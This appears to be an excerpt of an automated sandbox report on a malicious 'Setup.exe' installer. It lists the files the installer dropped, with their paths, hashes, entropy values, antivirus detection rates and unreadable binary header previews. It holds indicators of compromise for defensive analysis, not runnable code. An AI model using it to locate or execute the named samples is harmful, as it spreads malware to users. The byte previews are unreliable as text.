                                                                                                                                                                                                                                                              SHA-512:5B7C41DFE0F925FD0B4CAE040B4A01A11DA083251F49CB55B2D475366C575C2A7917A37B9CE54353573DFE01A6E02157E7E5425F687ADE5F4A4F56D1E09E3916
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:MSCF.....w......,.....................................%Z.. .Frank..T........%Z.. .Re......,....%Z.. .Enable..,........%Z.. .Prefix...........%Z.. .Chancellor...........%Z.. .Symbol...........%Z.. .Bang...........%Z.. .Answers...........%Z.. .Sons......o....%Z.. .Makes.z.-_.K..CK.}\T..7I...EE..Ie)./..:#/.....[.dx.dfx.Q.,.%3..............&....<eEieE..x.^N...go......s..\p..g..Z.Y.Z{........N..Xb..7.w.../1...;..........K...q.M+n^y.[o...;.Z}.=.6......|..u.7<.q.......6?...[.zz.3.>..../n......W..c.:v.ym..o.......w.;...?8..G.w~...}../....o.;...........O?...?~..N..|.i}CB..........<+..s.<o..Q./.0z.ECc....a.]>|D..+.F..3.....7>!q.D..QT\RZV.[.r{..kj..y...-..f....S.._.........o..II.)....3l.Y....)yS...M.1s...._.?....d..S..'.5..C.6..]...{...Q..3.).T..............'..o.G.....:G..Z..T...........j.."U.]URFt...U.s.......*...T.Z..0..Q.x.9...".....e..Z^....O.i..,p.............p..`......`.8.......S.N....x&....{.........g...6-........(0.....G..c...Dp(h.c...b..x...$.TW-......

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Und

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Setup.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):99328
                                                                                                                                                                                                                                                              Entropy (8bit):7.997987246841129
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:3072:aETPAswt6/YTUCBiS2S8/JZ4ZB/2GdN43:NPHwt6/nCQLJZ4/1dNw
                                                                                                                                                                                                                                                              MD5:4B02E727531966411D004BA983F04C56
                                                                                                                                                                                                                                                              SHA1:BE7A75ABA8C66AB7C3B20841E460A8D0DFF42E06
                                                                                                                                                                                                                                                              SHA-256:1D9A3B9E4277B27601BB2A0F75FE1232E5053E828AF698C909142B78FED1B474
                                                                                                                                                                                                                                                              SHA-512:978535D1A0A55160088ED8E5AF815A4B96DE35F361B880D4D06D353299D33EAB625E3A38204BCF2FE59E964AA206CA8CF07BBAFEDF1D4D990EFDD5D5649904F9
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:...@..( .....E.....$........c....v]3....%...B..jr&vm.-.._..a..*..-.C..6UV....ID..d.../......N...T.Dn......B0.T....].1...[0......I..(mJ...1.L>...e..0#..B..hIo.....kb..a.F...].3#.....L.w../q.^..|........l.....b>6G...M..YSU..A.4.....+._.....gBJj...}....q.C.4X....M.ut.....o)C....,.n.g.I.7...pz-...-...%\2..+.....[.YD.mQ..!(..........C...>...l....*0d.^Z{RL.5...I.\...\..r....^.q..ZG.u..V@..(.U...\...*..*..(o...s..Un.....L...V.Y....7~j.......}............z*..@..d...... ..#.GU.-.O..\7...?}.@$...#:.rzw.Z...R....8.l.."..^..# ...j....4.."Sg1...9....Z...A\.!.{.m...1t....S...s.....sB...g!1.F.....uSc....f].&5..t..*......,.J7B)1x.....?3..+.E.sA2ei=.".~.z.c..t>..i..W...d.;1<....U..[C.<...|g....AC5.J8.I".`]6"VcD......`j......?.F....+2.....';L....Y......MF.V%.!..t=..'....fdT5]....F9e..C@...&).....s.,.K.y.,..T...h..iZ.'....Z.....K..0...:>.ix.Q.z.m,.......@..........<.W...........DD..JW-...3.....a8X.JI..k0.....HB..".J.....+....3|l....p.cx.

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                                                              Entropy (8bit):1.1510207563435464
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:NlllulBkXj:NllUS
                                                                                                                                                                                                                                                              MD5:453075887941F85A80949CDBA8D49A8B
                                                                                                                                                                                                                                                              SHA1:7B31CA484A80AA32BCC06FC3511547BCB1413826
                                                                                                                                                                                                                                                              SHA-256:84466098E76D1CF4D262F2CC01560C765FE842F8901EEE78B2F74609512737F8
                                                                                                                                                                                                                                                              SHA-512:02E95B30978860CB5C83841B68C2E10EE56C9D8021DF34876CD33FD7F0C8B001C288F71FBBFF977DDF83031BD6CD86AC85688A6EFB6300D0221AA4A22ABE7659
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:@...e................................................@..........

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):8767044
                                                                                                                                                                                                                                                              Entropy (8bit):7.960152326344281
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:196608:r7B6e1u5SqD6mOefSP01pbtDgGFN6sskirwDODi:roweOFCS8jbtM8N6sjYY
                                                                                                                                                                                                                                                              MD5:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                                                                                                                                                              SHA1:60CD79359912A9069674CEE3C5C5982A9B01CE82
                                                                                                                                                                                                                                                              SHA-256:16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
                                                                                                                                                                                                                                                              SHA-512:7D2DF781963C8AC8A6F2A86EB95742AA26C932671D31DF8F09E334B2AF5E543EC3FB636ABFA4FB2512EC70126E1B9DB6DC7E9446A2A85BCA53EAFC790668964A
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                                              • Filename: installer_1.05_36.7.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: 'Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: Set-up.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: SET_UP.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: Full_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: Active_Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              • Filename: setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@.......................................@......@...................p..q....P.......................~..XG...........................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eb2bxgys.eeb.psm1

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g30m43lj.tck.ps1

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\e1128dc0

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                                                                                                                              File Type:PNG image data, 3792 x 2093, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):6447207
                                                                                                                                                                                                                                                              Entropy (8bit):7.998441497232368
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:196608:sXKjzP/kSY5cPYsvASGkG9166F/KHaj2M:sXKjrMSY5yPoxv/XL
                                                                                                                                                                                                                                                              MD5:B0CB3F07919BEB69B342ED871C6511A9
                                                                                                                                                                                                                                                              SHA1:C23C0B4F9810D50ECB9EA186F57325C7B41DEEBE
                                                                                                                                                                                                                                                              SHA-256:AB4A4A40AA1C1129150AE38AA4F939EB22B4125F6BE8F12251D7C76239B3F8F3
                                                                                                                                                                                                                                                              SHA-512:75BD57701CAC2BE23A9A63AE414F0E019D7C69523F93B3CE6D908B76CC382D84AB1F1C2B085633D39A8E7294C1879601A1A3B03C5871BA0E35A345F559E06AA4
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.......-.....1S.... .IDATx..;..G....+.U={.. .....H.$..gm........1c...&.r....wm..=...-F...W....ft...Y.........~.3+.....|....?@@...o......\.._@...c....0.e..o..us).-.9~.4..:.H]..R.#M.K.!...#.s...4..G.c.#Zk.#B.s...p......R...PU....HUU..RJ.......^...Ru]..n...&w.R.WeE.DH.kB...)....!.....cRI.....d.u.....W..j..xw... .e,.....lC`....o=.^ `..d....;.nH..|k..3..}......'Ts.....D....C..h.{......$.}w.np..h.n1..U9\F..<[...J..\..............c..f.6.g.o......$.1..^z)..8..c$./.|3...s.9..&.|...r....L.q..I~{)..>.uw..oY.d../..ksw..P..p.]....T.K1.R..i.........I.9B.....D@@@..a/.?.[ 8.K|......H..X..T...4.{..c..4..!.^...}X~7.'......uc.$H................|.{5...Q...,..{..p..]v{....m.]).....[-.{..... !l......V..W k....u....g...$....[%>^.oI.|.......$.......$.g.@...m.hI~S;.).=...K%..H.T..d"....W.O.J.A..../%..@..J..-...ZW........oz....b.....B..x.1......>q.....[..I>..l...t..I..I..n....s....P..p...C..3..|.(..<..3r.F7d.#..;..".p..dg.p.#4Mm........}.....A.......

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\is-320VG.tmp\_isetup\_isdecmp.dll

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp
                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):35616
                                                                                                                                                                                                                                                              Entropy (8bit):6.953519176025623
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                                                                                              MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                                                                                              SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                                                                                              SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                                                                                                                              SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\is-320VG.tmp\_isetup\_setup64.tmp

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp
                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):6144
                                                                                                                                                                                                                                                              Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                                              MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                                                              SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                                              SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                                              SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):3367424
                                                                                                                                                                                                                                                              Entropy (8bit):6.530011244733973
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                                                                                                                              MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                                                              SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                                                                                                                              SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                                                                                                                              SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\is-IRCRU.tmp\_isetup\_isdecmp.dll

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp
                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):35616
                                                                                                                                                                                                                                                              Entropy (8bit):6.953519176025623
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                                                                                                                                                              MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                                                                                                                                                              SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                                                                                                                                                              SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                                                                                                                                                              SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\is-IRCRU.tmp\_isetup\_setup64.tmp

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp
                                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):6144
                                                                                                                                                                                                                                                              Entropy (8bit):4.720366600008286
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                                                                                                                                                              MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                                                                                                                                                              SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                                                                                                                                                              SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                                                                                                                                                              SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):3367424
                                                                                                                                                                                                                                                              Entropy (8bit):6.530011244733973
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                                                                                                                                                              MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                                                                                                                                                              SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                                                                                                                                                              SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                                                                                                                                                              SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):846325235
                                                                                                                                                                                                                                                              Entropy (8bit):0.13954043794048707
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                                                                              SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                                                                                                                              SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                                                                                                                              SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\ColorStreamLib\is-STFPD.tmp

                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp
                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):846325235
                                                                                                                                                                                                                                                              Entropy (8bit):0.13954043794048707
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:
                                                                                                                                                                                                                                                              MD5:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                                                                              SHA1:FEB8A10FEE0388E1D93C669444F3A237C38EA5E4
                                                                                                                                                                                                                                                              SHA-256:0CE2CDB61164F5C03D11DEF609873901F58510F764E8491B4EC1A5D3E0759E0B
                                                                                                                                                                                                                                                              SHA-512:899CC13F5CD136D9F3D06BD13BD608CAB1DCEC1CE2F550A371C76253CFB155149A2CAE9827A365CCCFFA921A607A684DC7CD1A15645D317D7D9C199CEA1735F8
                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........"w.RC..RC..RC..I..`C..I...C..[;..UC..[;..IC..RC...B..I..NC..I..{C..I..SC..I..SC..RichRC..........................PE..L....NKO......................h...................@..........................@r.......r.......@.........................................:.e..........................................................................................................text...!........................... ..`.rdata...1.......2..................@..@.data...x........,..................@....rsrc...:.e.......e.................@..@........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                              Static File Info

                                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Entropy (8bit):4.438520098316072
                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                              File name:Setup.exe
                                                                                                                                                                                                                                                              File size:73'424'035 bytes
                                                                                                                                                                                                                                                              MD5:ede2e7d64a73a46b252525a4136b47bf
                                                                                                                                                                                                                                                              SHA1:5025d1d817d6d9f24f1d5197759fafe7cde6f0da
                                                                                                                                                                                                                                                              SHA256:bda506a1ae73f5514cbf100a95f54aeb2877368702fad312fabf0f2641b34f91
                                                                                                                                                                                                                                                              SHA512:86b65b2da27a30233b49e940f2b609cff3805bcf00aa75222e07f783e1e8fb4bcc5b5e4c6fc4e6e264419ccefd92f093acc0e850ace8a9ee34ff81ae59458460
                                                                                                                                                                                                                                                              SSDEEP:24576:lhYvug7sUOQNncXfPm+9zxBRj0oLvcXwH4OPFvpGIr7CJd:fLg7s0Kzx/j7zcXwJPFx17q
